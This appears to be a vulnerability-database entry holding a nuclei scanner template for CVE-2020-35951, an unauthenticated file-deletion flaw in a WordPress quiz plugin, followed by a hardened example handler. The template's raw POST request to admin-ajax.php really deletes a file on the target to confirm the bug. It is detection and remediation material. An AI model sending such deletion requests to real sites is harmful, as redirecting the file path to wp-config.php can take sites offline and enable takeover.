Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion

28 Jun 2026 15:08:32 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

WordPress Quiz and Survey Master < 7.0.1 has an arbitrary file deletion vulnerability that allows unauthenticated file deletions, leading to server compromise and data loss.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2020-35951 | 1 Jan 2021 07:32 | circl |
| CNNVD | WordPress Quiz and Survey Master plugin security vulnerability | 31 Dec 2020 00:00 | cnnvd |
| CVE | CVE-2020-35951 | 1 Jan 2021 03:27 | cve |
| Cvelist | CVE-2020-35951 | 1 Jan 2021 03:27 | cvelist |
| NVD | CVE-2020-35951 | 1 Jan 2021 04:15 | nvd |
| OSV | CVE-2020-35951 | 1 Jan 2021 04:15 | osv |
| Prion | Buffer overflow | 1 Jan 2021 04:15 | prion |
| RedhatCVE | CVE-2020-35951 | 5 Feb 2025 13:15 | redhatcve |
| Tenable Nessus | Quiz And Survey Master Plugin for WordPress < 7.0.1 Multiple Vulnerabilities | 31 Aug 2020 00:00 | nessus |
| wpexploit | Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion | 13 Aug 2020 00:00 | wpexploit |

id: CVE-2020-35951

info:
  name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
  author: princechaddha
  severity: critical
  description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
  impact: |
    This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
  remediation: |
    Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
    - https://wpscan.com/vulnerability/10348
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
    cvss-score: 9.9
    cve-id: CVE-2020-35951
    cwe-id: CWE-306
    epss-score: 0.76328
    epss-percentile: 0.99475
    cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: expresstech
    product: quiz_and_survey_master
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92


        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="action"

        qsm_remove_file_fd_question
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="file_url"

        {{fullpath}}wp-content/plugins/quiz-master-next/README.md
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92--
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')

      - type: word
        part: body
        words:
          - '{"type":"success","message":"File removed successfully"}'

    extractors:
      - type: regex
        name: fullpath
        group: 1
        regex:
          - not found in <b>([/a-z_]+)wp
        internal: true
        part: body
# digest: 4a0a00473045022100f784b39460105b2b7864352d95f3547c448aeb420ae7af954e6d0acd6f4d94490220740f1a895a4c2b4abc50780ea5340c4457e5c2759f605b7ef1b24acc0b111d46:922c64590222798bb761d5b6d8e72950
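
The template's description attributes the bug to qsm_remove_file_fd_question accepting unauthenticated requests and deleting whatever path arrives in file_url. The handler below is an added example of a hardened form of such an AJAX action; it is not the plugin's actual 7.0.1 patch and not part of the template. The nonce action qsm_fd_delete, the field name nonce, the uploads subdirectory qsm_uploads and the function name example_qsm_remove_file are assumptions.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: nonce action
// 'qsm_fd_delete', POST field 'nonce', uploads subdirectory 'qsm_uploads'.

add_action( 'wp_ajax_qsm_remove_file_fd_question', 'example_qsm_remove_file' );
add_action( 'wp_ajax_nopriv_qsm_remove_file_fd_question', 'example_qsm_remove_file' );

function example_qsm_remove_file() {
	// Third argument false: return false on a bad nonce instead of dying.
	// Nonces are shared across anonymous visitors, so this only blocks blind
	// cross-site requests; the path containment below is the control that holds.
	if ( ! check_ajax_referer( 'qsm_fd_delete', 'nonce', false ) ) {
		wp_send_json_error( array( 'message' => 'Invalid request' ), 403 );
	}

	$requested = ( isset( $_POST['file_url'] ) && is_string( $_POST['file_url'] ) )
		? wp_unslash( $_POST['file_url'] )
		: '';

	// realpath() resolves symlinks and ../ segments and is false for missing paths.
	$uploads = wp_upload_dir();
	$base    = realpath( trailingslashit( $uploads['basedir'] ) . 'qsm_uploads' );
	$target  = ( '' !== $requested ) ? realpath( $requested ) : false;

	if ( false === $base || false === $target || ! is_file( $target ) ) {
		wp_send_json_error( array( 'message' => 'File not found' ), 404 );
	}

	// Containment: the resolved file must sit under the allowed directory.
	// The trailing slash stops 'qsm_uploads_other/' from matching the prefix.
	$base   = trailingslashit( wp_normalize_path( $base ) );
	$target = wp_normalize_path( $target );
	if ( 0 !== strpos( $target, $base ) ) {
		wp_send_json_error( array( 'message' => 'Path not allowed' ), 403 );
	}

	wp_delete_file( $target );
	wp_send_json_success( array( 'message' => 'File removed successfully' ) );
}
```

With this check, a file_url that resolves to wp-config.php or to a file under wp-content/plugins/ is rejected before any delete call. Binding each file to the visitor who uploaded it is a separate control that this example does not show.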

Vulners AI Score: 7.3 (High risk, current as of 04 Feb 2026 07:00) | CVSS 2: 6.4 | CVSS 3.1: 9.9 | EPSS: 0.76328